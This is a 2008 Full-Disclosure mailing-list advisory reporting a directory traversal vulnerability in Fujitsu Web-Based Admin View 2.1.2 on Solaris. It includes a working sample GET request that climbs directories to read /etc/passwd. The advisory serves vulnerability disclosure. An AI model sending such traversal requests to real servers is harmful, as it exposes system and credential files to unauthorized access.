[Full-disclosure] Fujitsu Web-Based Admin View Directory Traversal Vulnerability

From: "Deniz Cevik" <Deniz.Cevik@xxxxxxxxxxxxxxxx>
Date: Thu, 21 Aug 2008 16:34:00 +0300

Fujitsu Web-Based Admin View Directory Traversal Vulnerability

Version: 2.1.2 on Solaris, Other versions may vulnerable

Vulnerability: Directory Traversal

Risk: Critical

Description: Due to insufficient control of user inputs, Fujitsu
Web-based admin view reveals content of files residing in folders other
than webroot. This will allow an attacker to view arbitrary local files
within the context of the web server.

Sample Request:

GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0

Host: target:8081

Deniz CEVIK

www.intellectpro.com.tr

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] Hacking OSPF with MD5 authentication enabled
Next by Date: [Full-disclosure] UPDATE: [ GLSA 200804-22 ] PowerDNS Recursor: DNS Cache Poisoning
Previous by thread: [Full-disclosure] Version-independent IOS shellcode
Next by thread: [Full-disclosure] UPDATE: [ GLSA 200804-22 ] PowerDNS Recursor: DNS Cache Poisoning
Index(es):
- Date
- Thread